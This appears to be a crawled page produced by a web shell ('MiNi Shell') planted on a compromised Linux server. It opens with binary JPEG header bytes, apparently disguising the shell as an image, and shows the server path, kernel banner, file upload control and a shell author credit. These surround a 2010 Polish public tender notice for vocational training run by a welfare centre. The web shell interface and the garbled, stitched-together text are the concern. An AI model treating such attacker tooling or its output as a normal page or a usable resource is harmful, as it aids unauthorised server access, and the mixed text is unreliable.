JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100902/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100902/274546-N-2010.html

<p class="kh_header"><b>Czechowice-Dziedzice: Przedmiotem  zamówienia  jest  zorganizowanie  i  przeprowadzenie  szkoleń zawodowych dla 17 osób -  klientów Ośrodka Pomocy Społecznej w Czechowicach- Dziedzicach, uczestniczących w projekcie Pomagać aktywnie - promocja aktywnej integracji w Gminie Czechowice- Dziedzice, współfinansowanym przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 274546 - 2010; data zamieszczenia: 02.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej w Czechowicach-Dziedzicach , ul. Kolejowa 37, 43-502 Czechowice-Dziedzice, woj. śląskie, tel. 032 2154409, faks 032 2154409.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem  zamówienia  jest  zorganizowanie  i  przeprowadzenie  szkoleń zawodowych dla 17 osób -  klientów Ośrodka Pomocy Społecznej w Czechowicach- Dziedzicach, uczestniczących w projekcie Pomagać aktywnie - promocja aktywnej integracji w Gminie Czechowice- Dziedzice, współfinansowanym przez Unię Europejską w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje szkolenia o specjalności: 

1.Kierowca operator wózków jezdniowych z elementami gospodarki magazynowej - 3 osoby
-wymagana ilość godzin  - min. 80 godzin
Celem szkolenia jest uzyskanie uprawnień na wózki podnośnikowe i unoszące, bezpieczną wymianę butli oraz zapoznanie z podstawowymi zagadnieniami gospodarki magazynowej      ( wyposażenie magazynu, obieg i rodzaje dokumentacji magazynowej, gospodarka opakowaniami).

2.Obsługa kasy fiskalnej i komputera - 4 osoby
-wymagana ilość godzin  - min. 50 godzin.
Minimum programowe - obsługa kasy fiskalnej:
-budowa i obsługa kasy,
-przygotowanie kasy do prowadzenia sprzedaży,
-programowanie kas różnego rodzaju,
-sprzedaż towarów na kasach,
-drukowanie raportów,
-wystawianie faktur i rachunków,
-obsługa terminali kart płatniczych,
Minimalny zakres tematyczny - obsługa komputera:
-składniki komputera,
-wprowadzenie do systemu WINDOWS,
-MS WORD - edytor tekstu
-formatowanie stron,
-formatowanie tekstu,
-tworzenie tabeli,
-MS EXCEL - arkusz kalkulacyjny.

3.Bukieciarstwo,  aranżacje roślinne i zdobienie przedmiotów
   techniką decoupage - 2 osoby
-wymagana ilość godzin  - min. 75 godzin
Program szkolenia powinien zawierać:
Florystyka:
-podstawowe informacje z zakresu botaniki,
-uprawa i pielęgnacja roślin ciętych i doniczkowych,
-zasady komponowania, kolorystyka,
-układanie wiązanek i stroików okolicznościowych,
-dekoracje z kwiatów suchych i sztucznych,
-kompozycje w naczyniach,
-kwiatowa aranżacja stołów,
-artykuły dekoracyjne i pomocnicze stosowane w układaniu kwiatów,
Decoupage 
-decoupage klasyczne
-technika serwetkowa,
-zastosowanie papieru ryżowego na różnych powierzchniach,
-techniki postarzania.

4.Kurs fryzjerski I stopnia - 1 osoba
-wymagana ilość godzin - min. 60 godzin
-wymagane badania sanitarno epidemiologiczne z wpisem do książeczki sanitarnej.
Minimalny zakres tematyczny:
-organizacja pracy w zakładzie fryzjerskim,
-trwała ondulacja (wodna, chemiczna),
-modelowanie włosów z zastosowaniem różnych technik skręcania i prostowania,                    -koloryzacja.

5.Kucharz - 1 osoba
-wymagana ilość godzin  - min. 130 godzin
-wymagane badania sanitarno epidemiologiczne z wpisem do książeczki sanitarnej.
Minimalny zakres tematyczny:
-poznawanie zasad żywienia, przepisów kulinarnych,
-poznawanie organizacji produkcji,
-technologia gastronomiczna,
-towaroznawstwo spożywcze,
-zajęcia praktyczne w zakresie kucharz,
-przygotowanie sali konsumpcyjnej,
-organizacja przyjęć okolicznościowych.

6.Opiekun osób starszych i niepełnosprawnych - 1 osoba
-wymagana ilość godzin zajęciowych - min. 70 godzin
-wymagane badania sanitarno epidemiologiczne z wpisem do książeczki sanitarnej.
Minimalny zakres tematyczny:
-rola i zadania opiekuna osób, formy opieki i pomocy ludziom starszym,
-anatomia z fizjologią,
-postawa wobec uczuć i sposobu zachowania pielęgnowanej osoby,
-choroby wieku podeszłego,
-problemy opieki chorych niepełnosprawnych,
-profilaktyka odleżyn oraz długotrwałego unieruchomienia,
-zasady żywienia ludzi chorych, starych i niepełnosprawnych.

7.Stylizacja paznokci - 1 osoba
-wymagana ilość godzin - min. 20 godzin
-wymagane badania sanitarno epidemiologiczne z wpisem do książeczki sanitarnej.
Minimalny zakres tematyczny:
-manicure, pedicure,
-metoda żelowa,
-akryl, zdobnictwo.

8. Wizaż, stylizacja i kosmetyka - 1 osoba
-wymagana ilość godzin - min. 60 godzin
-wymagane badania sanitarno epidemiologiczne z wpisem do książeczki sanitarnej.
Minimalny zakres tematyczny:
-zasady makijażu,
-analiza kolorystyczna twarzy,
-stylizacja twarzy i makijażu,
-stylizacja postaci,
-stylizacja fryzur.

9.Sprzedawca, handlowiec - 2 osoby
Wymagana ilość godzin zajęciowych - min. 80 godzin
Minimalny zakres tematyczny:
-przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej,
-podstawowe zasady i wymogi sanitarne w placówkach handlowych,
-organizacja sprzedaży detalicznej,
-organizacja zaopatrzenia i przyjmowania dostaw towaru,
-wykonywanie i dokumentowanie podstawowych obliczeń sklepowych,
-obsługa klienta,
-obsługa programu handlowego,
-obsługa komputera,
-obsługa kasy fiskalnej.

10.Komputer dla zaawansowanych i grafika komputerowa - 1 osoba
-wymagana ilość godzin - min.90 godzin.
Minimalny zakres szkolenia - komputer dla zaawansowanych:
-edytor tekstów WORD,
-arkusz kalkulacyjny EXEL,
-baza danych ACCESS,
-inne programy z zakresu MS OFFICE np.  FrontPage, Power paint, Project
Minimalny zakres szkolenia - grafika komputerowa:
CorelDraw
- interfejs programu CorelDraw,
-tworzenie nowych rysunków, zapisywanie i otwieranie,
-powiększanie i przewijanie widoku strony,
-podstawowe narzędzia do rysowania,
-narzędzia edycyjne,
-kontury i wypełnienia,
-tekst i obróbka tekstu,
-efekty specjalne.
Photoshop
-środowisko pracy programu Photoshop,
-praca z obrazem,
-retusz fotografii,
-korygowanie obrazu,
-praca na warstwach,
-podstawy fotomontażu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 07.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku. Ocena spełniania warunku będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku. Zamawiający żąda wykazania się jedną usługą z każdego tematu szkolenia. Ocena spełniania warunku będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.Ocena spełniania warunku będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku. Ocena spełniania warunku będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunku.Ocena spełniania warunku będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypis z rejestru instytucji szkoleniowych w Wojewódzkim Urzędzie Pracy na podstawie art.20 ust. 1 ustawy z dnia 20.04 2004 r. o promocji zatrudnienia i instytucjach rynku pracy 
( Dz. u. z 2004 r. nr 99 poz. 1001 z późn. zm.)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zdarzeń losowych oraz wystąpienia szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w szczególności w zakresie:
- harmonogramu,
-ilości osób uczestniczących w zajęciach,
-ilości szkoleń,
- w przypadku wystąpienia okoliczności niezależnych od wykonawcy zmiany osób bezpośrednio prowadzących zajęcia (przypadki losowe) pod warunkiem, że osoby te będą spełniać wszystkie wymagania określone w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ops-czechowice.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej, 43-502 Czechowice- Dziedzice, ul. Kolejowa 37 (sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2010 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej, 43-502 Czechowice- Dziedzice, ul. Kolejowa 37 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone w związku z realizacją projektu Pomagać aktywnie - promocja aktywnej integracji w Gminie Czechowice- Dziedzice, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com